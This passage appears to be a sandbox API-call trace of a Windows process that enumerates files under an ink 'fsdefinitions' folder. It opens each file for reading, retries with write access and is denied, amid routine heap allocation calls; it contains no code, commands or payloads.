RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.315] AreFileApisANSI () returned 1 [0099.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", lpUsedDefaultChar=0x0) returned 76 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.316] AreFileApisANSI () returned 1 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85120 [0099.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 76 [0099.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.316] GetFileType (hFile=0x418) returned 0x1 [0099.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0099.316] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.316] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.316] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.317] CloseHandle (hObject=0x418) returned 1 [0099.317] AreFileApisANSI () returned 1 [0099.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85b20 [0099.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 76 [0099.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.317] GetLastError () returned 0x5 [0099.317] GetLastError () returned 0x5 [0099.317] SetLastError (dwErrCode=0x5) [0099.317] GetLastError () returned 0x5 [0099.317] SetLastError (dwErrCode=0x5) [0099.317] GetLastError () returned 0x5 [0099.317] SetLastError (dwErrCode=0x5) [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.317] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="main", cAlternateFileName="")) returned 1 [0099.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0099.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0099.318] AreFileApisANSI () returned 1 [0099.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpUsedDefaultChar=0x0) returned 70 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.318] AreFileApisANSI () returned 1 [0099.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ae18 [0099.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 70 [0099.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.318] GetLastError () returned 0x5 [0099.318] GetLastError () returned 0x5 [0099.318] SetLastError (dwErrCode=0x5) [0099.319] GetLastError () returned 0x5 [0099.319] SetLastError (dwErrCode=0x5) [0099.319] GetLastError () returned 0x5 [0099.319] SetLastError (dwErrCode=0x5) [0099.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0099.319] AreFileApisANSI () returned 1 [0099.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aeb0 [0099.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 70 [0099.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.319] GetLastError () returned 0x5 [0099.319] GetLastError () returned 0x5 [0099.319] SetLastError (dwErrCode=0x5) [0099.319] GetLastError () returned 0x5 [0099.319] SetLastError (dwErrCode=0x5) [0099.319] GetLastError () returned 0x5 [0099.319] SetLastError (dwErrCode=0x5) [0099.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0099.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0099.320] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.320] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x785d0 [0099.320] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.320] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd05, dwReserved0=0x0, dwReserved1=0x0, cFileName="base.xml", cAlternateFileName="")) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0099.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.321] AreFileApisANSI () returned 1 [0099.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", lpUsedDefaultChar=0x0) returned 79 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.321] AreFileApisANSI () returned 1 [0099.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8ca40 [0099.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 79 [0099.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.322] GetFileType (hFile=0x27c) returned 0x1 [0099.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.322] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.322] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.322] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.322] CloseHandle (hObject=0x27c) returned 1 [0099.323] AreFileApisANSI () returned 1 [0099.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c650 [0099.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 79 [0099.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.323] GetLastError () returned 0x5 [0099.323] GetLastError () returned 0x5 [0099.323] SetLastError (dwErrCode=0x5) [0099.323] GetLastError () returned 0x5 [0099.323] SetLastError (dwErrCode=0x5) [0099.323] GetLastError () returned 0x5 [0099.323] SetLastError (dwErrCode=0x5) [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.323] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, 